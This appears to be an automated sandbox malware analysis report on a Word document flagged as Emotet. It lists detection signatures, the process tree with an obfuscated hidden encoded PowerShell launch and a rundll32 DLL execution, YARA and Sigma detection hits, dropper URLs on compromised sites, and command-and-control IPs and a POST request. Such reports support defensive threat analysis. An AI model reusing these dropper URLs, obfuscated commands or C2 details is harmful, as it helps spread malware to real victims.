
Analysis Report Informacion_29.doc

Overview

General Information

Sample Name: Informacion_29.doc
Analysis ID: 336937
MD5: 6c1cb4c06ead6f5ce29a931fa12410fa
SHA1: 4ac228fa54e73993dcccb69389a97cfcf67228b5
SHA256: 43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6804 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cmd.exe (PID: 7000 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msg.exe (PID: 7044 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)
    • powershell.exe (PID: 7064 cmdline: POwersheLL -w hidden -ENCOD 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
      • rundll32.exe (PID: 204 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL MD5: 73C519F050C20580F8A62C849D49215A)
        • rundll32.exe (PID: 4456 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 5692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6520 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 784 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4648 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5552 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4560 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 912 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7072 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.289454945.0000018A154BB000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x2f9c:$s1: POwersheLL
  • 0x595c:$s1: POwersheLL
  • 0x9432:$s1: POwersheLL
0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000003.278200486.0000018A2C3D3000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x340:$s1: POwersheLL
00000004.00000002.280486298.0000018A13D20000.00000004.00000040.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x1ac0:$s1: POwersheLL
00000004.00000002.290625263.0000018A2C1D0000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x2ba:$s1: POwersheLL

Unpacked PEs

Source | Rule | Description | Author | Strings
14.2.rundll32.exe.3410000.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
14.2.rundll32.exe.3410000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
13.2.rundll32.exe.29e0000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
13.2.rundll32.exe.29e0000.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
13.2.rundll32.exe.41b0000.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: POwersheLL -w hidden -ENCOD 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

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: rycomputer.com | Virustotal: Detection: 11%
Source: 00zyku.com | Virustotal: Detection: 7%
Source: wheelcomoving.com | Virustotal: Detection: 7%
Source: d-cem.com | Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll | Metadefender: Detection: 63%
Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll | ReversingLabs: Detection: 60%
Multi AV Scanner detection for submitted file
Source: Informacion_29.doc | Virustotal: Detection: 62%
Source: Informacion_29.doc | ReversingLabs: Detection: 79%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_034375AE CryptDecodeObjectEx,14_2_034375AE
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 58.97.195.135:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 35.214.169.246:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb | source: powershell.exe, 00000004.00000002.290931845.0000018A2C3AD000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb | source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb* | source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbJ | source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: B:\cliprgn_src\Release\ClipRgn.pdb | source: rundll32.exe, 0000000D.00000002.285896384.0000000010042000.00000002.00020000.sdmp, Q27V.dll.4.dr
Source: Binary string: System.pdb | source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb | source: powershell.exe, 00000004.00000002.290651149.0000018A2C320000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,13_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10026EEF FindFirstFileExW,13_2_10026EEF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0343109C FindFirstFileW,14_2_0343109C
Source: global traffic | DNS query: name: wheelcomoving.com
Source: global traffic | TCP traffic: 192.168.2.3:49722 -> 58.97.195.135:443
Source: global traffic | TCP traffic: 192.168.2.3:49711 -> 66.85.46.76:80

Networking:

              Potential dropper URLs found in powershell memoryShow sources
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke0
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/" rel="bookmark" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/" rel="bookmark" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eating-daniela-diaries/" rel="bookmark" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-programme-free-all-access-pass/" rel="bookmark" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/" rel="bookmark" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></span></a></div>
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide0
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in memory: type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div>
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in memory: <li id="menu-item-1598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-1598"><a title="" href="https://wheelcomoving.com/">Home</a></li><li id="menu-item-2113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2113"><a href="https://wheelcomoving.com/track-and-trace/">TRACK AND TRACE</a></li><li id="menu-item-1158" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: http://wheelcomoving.com/p/RuMeRPa/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: http://00zyku.com/wp-admin/eYu1Q/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: http://ketoresetme.com/wp-content/pmJ/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: https://rycomputer.com/content/TL/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: https://d-cem.com/wp-admin/JSLwG1/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: http://thebestfikrah.com/wp-admin/fOIlVX/
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in memory: https://phawayagency.com/wp-admin/mXo4b/
              Source: global trafficTCP traffic: 192.168.2.3:49755 -> 138.197.99.250:8080
              Source: global trafficHTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 66.85.46.76 66.85.46.76
              Source: Joe Sandbox ViewIP Address: 152.170.79.100 152.170.79.100
              Source: Joe Sandbox ViewASN Name: HOST4GEEKS-LLCUS HOST4GEEKS-LLCUS
              Source: Joe Sandbox ViewASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
              Source: Joe Sandbox ViewASN Name: TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH
              Source: Joe Sandbox ViewASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1DNT: 0Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1CxtnUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 138.197.99.250:8080Content-Length: 6500Connection: Keep-AliveCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 152.170.79.100
              Source: unknownTCP traffic detected without corresponding DNS query: 152.170.79.100
              Source: unknownTCP traffic detected without corresponding DNS query: 152.170.79.100
              Source: unknownTCP traffic detected without corresponding DNS query: 190.247.139.101
              Source: unknownTCP traffic detected without corresponding DNS query: 190.247.139.101
              Source: unknownTCP traffic detected without corresponding DNS query: 190.247.139.101
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: unknownTCP traffic detected without corresponding DNS query: 138.197.99.250
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0344023A InternetReadFile,14_2_0344023A
              Source: global trafficHTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.facebook.com (Facebook)
